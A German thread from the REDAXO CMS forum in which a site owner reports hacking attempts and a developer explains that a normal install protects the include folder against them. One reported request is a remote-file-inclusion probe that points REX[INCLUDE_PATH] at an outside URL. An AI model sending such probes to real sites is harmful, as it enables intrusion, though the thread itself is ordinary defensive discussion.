Hallo zusammen,
seit einigen Tagen habe auf meiner neuen Website immer häufiger Hackversuche, d.h. Aufrufe in der Art:
//redaxo/include/addons/image_resize/pages/index.inc.php?REX[INCLUDE_PATH]=http://example.com/echo.txt??
Sind hier im Forum so viele Crawler unterwegs die nach Redaxo-Seiten suchen und dann versuchen Ihren Schadcode dort einzuschleusen?
Meine Website ist sonst noch nirgendwo verlinkt, daher gehe ich einfach mal davon aus, dass diese Bots die URL von hier haben.
Ist euch schon ähnliches aufgefallen?
Für meine Webseiten setze ich gegen Crawler und Spammer das Schutzscript von http://www.bot-trap.de// ein. Das wäre doch auch was für dieses Forum.
Gruß
Jürgen
Hallo,
Wir haben in letzter Zeit festgestellt, dass die Kommunikation via Slack viel schneller und zielführender ist als ein Beitrag im Forum. Aufgrund der neuen und besseren Möglichkeiten der Kommunikation haben wir uns entschlossen das Forum nur noch als Archiv zur Verfügung zu stellen. Somit bleibt es weiterhin möglich hier nach Lösungen zu suchen. Neue Beiträge können nicht mehr erstellt werden.
Wir empfehlen, für deine Fragen/Probleme Slack zu nutzen. Dort sind viele kompetente Benutzer aktiv und beantworten jegliche Fragen, gerne auch von REDAXO-Anfängern! Slack wird von uns sehr intensiv und meistens "rund um die Uhr" benutzt
Selbst einladen kannst Du dich hier: https://redaxo.org/slack/
Wir haben in letzter Zeit festgestellt, dass die Kommunikation via Slack viel schneller und zielführender ist als ein Beitrag im Forum. Aufgrund der neuen und besseren Möglichkeiten der Kommunikation haben wir uns entschlossen das Forum nur noch als Archiv zur Verfügung zu stellen. Somit bleibt es weiterhin möglich hier nach Lösungen zu suchen. Neue Beiträge können nicht mehr erstellt werden.
Wir empfehlen, für deine Fragen/Probleme Slack zu nutzen. Dort sind viele kompetente Benutzer aktiv und beantworten jegliche Fragen, gerne auch von REDAXO-Anfängern! Slack wird von uns sehr intensiv und meistens "rund um die Uhr" benutzt
Selbst einladen kannst Du dich hier: https://redaxo.org/slack/
-
Joachim.Dörr
- Beiträge: 1403
- Registriert: 7. Apr 2006, 01:49
- Kontaktdaten: ICQ Website
-
Jan.Kristinus
- Admin
- Beiträge: 2166
- Registriert: 24. Aug 2004, 22:11
- Wohnort: Frankfurt
- Kontaktdaten: ICQ Website
Hallo,
es gibt mit den downloadversionen keine probleme wenn man die installation normal durchführt, da hier dann überprüft wird ob der "include" Ordner geschützt ist (also von aussen nicht zugreifbar ist). Beim Umzug einer Webseite sollte man immer das Setup sicherheitshalber durchführen, um zu sehen ob der Ordner weiterhin sicher ist... das wars.
lg
jn
PS: Diese Aufrufe sind "normal", da es immernoch Hackerscripte gibt, die hoffen auf alte unsichere Versionen zu stossen (Es gab mal einen Bug Anfang letzten Jahres). So schlimm das klingt - das ist überall bei unterschiedlichsten Webseiten und CMSen so.
es gibt mit den downloadversionen keine probleme wenn man die installation normal durchführt, da hier dann überprüft wird ob der "include" Ordner geschützt ist (also von aussen nicht zugreifbar ist). Beim Umzug einer Webseite sollte man immer das Setup sicherheitshalber durchführen, um zu sehen ob der Ordner weiterhin sicher ist... das wars.
lg
jn
PS: Diese Aufrufe sind "normal", da es immernoch Hackerscripte gibt, die hoffen auf alte unsichere Versionen zu stossen (Es gab mal einen Bug Anfang letzten Jahres). So schlimm das klingt - das ist überall bei unterschiedlichsten Webseiten und CMSen so.
Yakamara Media GmbH & Co. KG | Kaiserstrasse 69 | 60329 Frankfurt
Tel.: 069-900.20.60.30
http://www.yakamara.de/
Tel.: 069-900.20.60.30
http://www.yakamara.de/
Ähnliche Aufrufe habe ich auch bei anderen Seiten. Daher kenne ich das ganze schon lange. Was mich nur erstaunt hat ist, dass diese Aufrufe kurz nach meinem ersten Posting mit der URL hier Forum angefangen haben.Jan.Kristinus hat geschrieben: PS: Diese Aufrufe sind "normal", da es immernoch Hackerscripte gibt, die hoffen auf alte unsichere Versionen zu stossen (Es gab mal einen Bug Anfang letzten Jahres). So schlimm das klingt - das ist überall bei unterschiedlichsten Webseiten und CMSen so.
Man kann sicher aber gegen solche Aufrufe und das Abgrasen von Webseiten schützen, z.B. mit dem Script von http://bot-trap.de. Das blockt bei mir die meisten Botzugriffe.
Gruß
Jürgen